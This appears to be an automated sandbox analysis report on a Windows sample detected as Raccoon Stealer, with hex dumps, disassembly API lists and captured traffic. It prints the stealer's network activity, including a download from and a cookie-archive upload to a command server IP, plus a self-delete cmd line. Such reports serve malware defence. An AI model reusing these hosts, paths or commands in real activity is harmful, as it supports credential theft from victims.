00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Sep 27, 2021 23:55:24.899215937 CEST	940	IN	Data Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B
Sep 27, 2021 23:55:24.899272919 CEST	941	IN	Data Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc Data Ascii: BZ\|$D$4$!\|$D$4$\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
Sep 27, 2021 23:55:24.899341106 CEST	941	IN	Data Raw: 04 24 ff d2 c9 c3 31 c0 c3 55 31 c0 ba 01 00 00 00 89 e5 83 ec 10 dd 45 08 dd 5d f0 dd 45 f0 dd 5d f8 dd 45 f0 dd 45 f8 c9 df e9 dd d8 0f 9a c0 0f 45 c2 c3 85 c0 74 4d 0f b6 08 80 b9 60 a4 ea 61 00 89 ca 79 3f 55 Data Ascii: $1U1E]E]EEEtM`ay?U
Sep 27, 2021 23:55:24.899614096 CEST	943	IN	Data Raw: 80 f9 5b b1 5d 0f 44 d1 b9 01 00 00 00 89 e5 57 56 53 be 01 00 00 00 8a 1c 08 8d 7e ff 38 da 75 0d 3a 54 08 01 75 0f 88 54 30 ff 41 eb 04 88 5c 30 ff 41 46 eb e1 5b c6 04 38 00 5e 5f 5d c3 55 89 e5 57 56 89 c6 53 31 db 0f b6 0c 1e 0f b6 3c 1a 89 Data Ascii: []DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1KtBOG1x4`a`a)t2`
Sep 27, 2021 23:55:24.899766922 CEST	944	IN	Data Raw: 01 76 54 b9 28 00 00 00 83 e9 0a 01 c0 11 d2 83 fa 00 77 34 83 f8 07 76 ef eb 2d 3d ff 00 00 00 76 1f 0f ac d0 04 83 c1 28 c1 ea 04 83 fa 00 77 f1 eb e8 83 f8 0f 76 10 0f ac d0 01 83 c1 0a d1 ea 83 fa 00 77 f2 eb eb 83 e0 07 66 8b 84 00 ec 2f ea Data Ascii: vT(w4v-=v(wvwf/aL]t+UVSX94uDL0911[^]U1@Ht`aiy7]UWVSSXtM1M6X0Xp1tC
Sep 27, 2021 23:55:27.794083118 CEST	1886	OUT	GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 27, 2021 23:55:28.035495043 CEST	1887	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 21:55:28 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@
Sep 27, 2021 23:55:35.209006071 CEST	4813	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 1405 Host: 185.138.164.150
Sep 27, 2021 23:55:35.209070921 CEST	4815	OUT	Data Raw: 98 df d1 02 22 0d 0a 2d 2d 76 44 32 74 4c 31 71 43 39 62 43 33 7a 56 39 65 44 39 79 58 38 64 55 38 79 59 38 6c 43 31 63 56 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 34 Data Ascii: "--vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVcontent-disposition: form-data; name="45FBKXwB3dP17SpzZps0"; filename="45FBKXwB3dP17SpzZps0.zip"Content-Type: application/octet-streamPK;S_Z*browsers/cookies/Google Chrome
Sep 27, 2021 23:55:35.517987013 CEST	4815	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 21:55:35 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 32 38 0d 0a 31 39 31 36 30 39 39 38 66 65 62 34 32 34 66 63 35 34 37 61 64 31 32 32 38 65 39 65 61 66 65 64 64 37 33 35 36 38 30 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 2819160998feb424fc547ad1228e9eafedd73568000

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49744	149.154.167.99	443	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Timestamp	Direction	Data
2021-09-27 21:55:24 UTC	OUT	GET /agrybirdsgamerept HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: t.me
2021-09-27 21:55:24 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 27 Sep 2021 21:55:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4597 Connection: close Set-Cookie: stel_ssid=34c35c3dbe11bf5567_13933969989189526928; expires=Tue, 28 Sep 2021 21:55:24 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=35768000
2021-09-27 21:55:24 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124 Parent PID: 5740

General

Start time:	23:55:18
Start date:	27/09/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Imagebase:	0x400000
File size:	448000 bytes
MD5 hash:	E283621CD5DEA00D95791A88EECDA925
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6212 Parent PID: 7124

General

Start time:	23:55:36
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5652 Parent PID: 6212

General

Start time:	23:55:36
Start date:	27/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 5864 Parent PID: 6212

General

Start time:	23:55:36
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /T 10 /NOBREAK
Imagebase:	0x10e0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124 Parent PID: 5740 SecuriteInfo.com.W32.AIDetect.malware1.14529.exeCOMMON

Executed Functions

Function 0042C383, Relevance: 144.8, APIs: 34, Strings: 45, Instructions: 6501threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042C388
CoInitialize.OLE32(00000000), ref: 0042C3A4

Part of subcall function 004360E7: OpenMutexA.KERNEL32 ref: 00436130
Part of subcall function 004360E7: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D

CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00432A17

Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92

GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 0042C3E8
GetLocaleInfoA.KERNEL32(00000000), ref: 0042C3EF

Part of subcall function 00438EA2: __EH_prolog.LIBCMT ref: 00438EA7
Part of subcall function 00438EA2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00438F09
Part of subcall function 00438EA2: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00438F23
Part of subcall function 00438EA2: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00438F97
Part of subcall function 00438EA2: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00438FA9
Part of subcall function 00438EA2: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00438FC4
Part of subcall function 00438EA2: CloseHandle.KERNEL32(?,?,?,00000000), ref: 00438FD1
Part of subcall function 00438EA2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00438FE4

Part of subcall function 00414F98: __EH_prolog.LIBCMT ref: 00414F9D

Sleep.KERNEL32(00001388,00489110,00000000,0047935B), ref: 0042C988

Part of subcall function 004358BF: __EH_prolog.LIBCMT ref: 004358C4

GetUserNameA.ADVAPI32(?,00000101), ref: 0042CB6C

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Sleep.KERNEL32(00007530), ref: 0042CD2A

Part of subcall function 00423759: __EH_prolog.LIBCMT ref: 0042375E

_strlen.LIBCMT ref: 0042CE4B
_strlen.LIBCMT ref: 0042CE65
CreateThread.KERNEL32 ref: 0042D0AF
CreateThread.KERNEL32 ref: 0042D0C1
StrToIntA.SHLWAPI(00000000,00000000,00489798), ref: 0042D203

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004344AA: __EH_prolog.LIBCMT ref: 004344AF
Part of subcall function 004344AA: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
Part of subcall function 004344AA: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

CreateThread.KERNEL32 ref: 0042D524
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042D52D
CreateThread.KERNEL32 ref: 0042D0D3

Part of subcall function 00432C77: __EH_prolog.LIBCMT ref: 00432C7C

Part of subcall function 004296D2: __EH_prolog.LIBCMT ref: 004296D7

Part of subcall function 00438CD8: __EH_prolog.LIBCMT ref: 00438CDD

Strings

{, xrefs: 0042DF58
Q, xrefs: 00430A01
r, xrefs: 00431B48
7, xrefs: 0042F365
25ef3d2ceb7c85368a843a6d0ff8291d , xrefs: 0042C6DA
\, xrefs: 0042E886
C, xrefs: 0042D807
H, xrefs: 0042EEF7
}, xrefs: 0042F1CF
~, xrefs: 004323B2
N, xrefs: 0042FCEE
=, xrefs: 0042E9ED
s, xrefs: 0042E432
O, xrefs: 0043283E
_, xrefs: 004306E4
p, xrefs: 0042EC49
v, xrefs: 004304EB
f, xrefs: 0042F829
<, xrefs: 00430ED7
/, xrefs: 0042FB5E
G, xrefs: 00431A40
[, xrefs: 0042D71E
5, xrefs: 00432073
&, xrefs: 0043267F
POST, xrefs: 0042CCCF
V, xrefs: 004301B5
, xrefs: 00432336
:, xrefs: 0042F9CD
qSVdAbi/K2pPr/3e18wU+9RXCqXPWsSoxpYUtF+O , xrefs: 0042C6B7
S, xrefs: 00431FEE
b, xrefs: 00432269
h, xrefs: 0042EB3F
s, xrefs: 0043245F
(, xrefs: 0042DA2D
_id, xrefs: 004319DB
Q, xrefs: 00432565
4, xrefs: 0042DC7E
,, xrefs: 0042ED26
W, xrefs: 004321D2
0, xrefs: 0042DB43
C, xrefs: 00430075
9DdPQajmZndZ4qCLnM5Gu8kEArObEJr9kpZfshjMFLdbDkIa0SdMPw== , xrefs: 0042C6C7
GET, xrefs: 0042C910, 0042C9A5
<, xrefs: 0042D902
2, xrefs: 0042E71B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Create$OpenToken$ProcessThread$DeallocateFileGlobalInformationMutexNameSleepUser_strlen$AllocCloseConvertCurrentDefaultDuplicateEnvironmentErrorFirstFreeHandleHttpInfoInitializeLastLocaleModuleObjectProcess32SingleSnapshotStringToolhelp32UninitializeVariableWait_strcat
String ID: $&$($,$/$0$2$25ef3d2ceb7c85368a843a6d0ff8291d $4$5$7$9DdPQajmZndZ4qCLnM5Gu8kEArObEJr9kpZfshjMFLdbDkIa0SdMPw== $:$<$<$=$C$C$G$GET$H$N$O$POST$Q$Q$S$V$W$[$\$_$_id$b$f$h$p$qSVdAbi/K2pPr/3e18wU+9RXCqXPWsSoxpYUtF+O $r$s$s$v${$}$~
API String ID: 376243089-3970548752
Opcode ID: 9087ea496a28465d025422bdcaf11cf2faf17ecf5d92b2d53b263a7f29d56023
Instruction ID: 4fe60910e1ec4b79d226cabb142ab88437985495ab14f2297e82cd6290d5d1cb
Opcode Fuzzy Hash: 9087ea496a28465d025422bdcaf11cf2faf17ecf5d92b2d53b263a7f29d56023
Instruction Fuzzy Hash: DED39F34D052A89ADF25E765DC51BEDBBB46F25308F0004DEA54973293DE782B88CF29

Uniqueness

Uniqueness Score: -1.00%

Function 00437819, Relevance: 104.4, APIs: 13, Strings: 46, Instructions: 1169COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043781E

Part of subcall function 004373C6: __EH_prolog.LIBCMT ref: 004373CB
Part of subcall function 004373C6: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
Part of subcall function 004373C6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
Part of subcall function 004373C6: RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6

_strftime.LIBCMT ref: 0043794F
GetUserDefaultLCID.KERNEL32(00001001,?,00000100,?,?,?,?,?), ref: 00437978
GetLocaleInfoA.KERNEL32(00000000), ref: 0043797F
GetUserNameA.ADVAPI32(?,?), ref: 00437BD0
GetComputerNameA.KERNEL32 ref: 00438275
GetUserNameA.ADVAPI32(00000001,00000101), ref: 004382EF
GetSystemInfo.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000012,00000040,00000001), ref: 0043861D
GlobalMemoryStatusEx.KERNEL32(?,?,?,00000000,00000012,00000040,00000001), ref: 00438707
GetSystemMetrics.USER32 ref: 0043888C

Part of subcall function 00439503: __EH_prolog.LIBCMT ref: 00439508

Part of subcall function 00413B98: __EH_prolog.LIBCMT ref: 00413B9D

GetSystemMetrics.USER32 ref: 004388B4
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00438950
EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 004389AC

Strings

t5q|, xrefs: 0043790B
Qt, xrefs: 004378EE
V\, xrefs: 004388DF
/Ifc, xrefs: 00437E62
FPFY, xrefs: 004379D9
/L_Z, xrefs: 004384B7
v, xrefs: 00437B85
isut, xrefs: 0043831C
!;, xrefs: 00438407
qt, xrefs: 00437915
XLJH, xrefs: 00437F33
JSRO, xrefs: 0043883F
0000, xrefs: 00437D2C
3>58, xrefs: 00437ADB
)vl, xrefs: 00438220
00, xrefs: 00437D38
F"#5-2)6, xrefs: 00437CE7
0000, xrefs: 00437D22
(EJ( , xrefs: 0043877A
USED, xrefs: 004387C8
9}<), xrefs: 00437AE5
g}, xrefs: 00437AF1
@, xrefs: 004386FC
x, xrefs: 00437B42
., xrefs: 004381ED
2'6i, xrefs: 00437A53
+Hdd, xrefs: 00437D92
1+, xrefs: 00437DA8
am, xrefs: 00438178
:, xrefs: 00438330
Wed Sep 8 00:01:38 2021, xrefs: 00437A2B
)!, xrefs: 00438653
j|5/, xrefs: 00437E6E
rRR_R 3?HR, xrefs: 004386DA
2p]F, xrefs: 00437B76
4L, xrefs: 00438456
:TN, xrefs: 00438326
x, xrefs: 00437FA6
`bnx, xrefs: 00437D9E
KKFK";QK, xrefs: 00438050
tcu/, xrefs: 00438678
Z, xrefs: 004388E8
aaaaaaaaaaaaa, xrefs: 004389F7
s, xrefs: 00437A5D
m{, xrefs: 00437B7F
5/, xrefs: 004384C0

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$NameSystemUser$DevicesDisplayEnumInfoMetrics$CloseComputerDefaultGlobalLocaleMemoryOpenQueryStatusValue_strftime
String ID: )!$ :TN$!;$(EJ( $)vl$+Hdd$.$/Ifc$/L_Z$00$0000$0000$1+$2'6i$2p]F$3>58$4L$5/$9}<)$:$@$F"#5-2)6$FPFY$JSRO$KKFK";QK$Qt$USED$V\$Wed Sep 8 00:01:38 2021$XLJH$Z$`bnx$aaaaaaaaaaaaa$am$g}$isut$j|5/$m{$qt$rRR_R 3?HR$s$t5q|$tcu/$v$x$x
API String ID: 3358139242-950190238
Opcode ID: 5627f962eff4ac5fd40bbf4c93766949d76b5cead170ca96471c899b358139dd
Instruction ID: dd1f520b829340a486540dcb48aec28350ce5d403088cebc98d7579fb37bcb2b
Opcode Fuzzy Hash: 5627f962eff4ac5fd40bbf4c93766949d76b5cead170ca96471c899b358139dd
Instruction Fuzzy Hash: A3B2D0309083988ACF25DB7588957EDBB71AF1A304F0045EED4897B242EB781F89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043628C, Relevance: 90.3, APIs: 37, Strings: 14, Instructions: 1081registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00436291

Part of subcall function 0043922A: __EH_prolog.LIBCMT ref: 0043922F

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000,0000000A,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040), ref: 0043638B
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436398
RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 004363D1
wsprintfW.USER32 ref: 004363F9
RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436418
RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436494
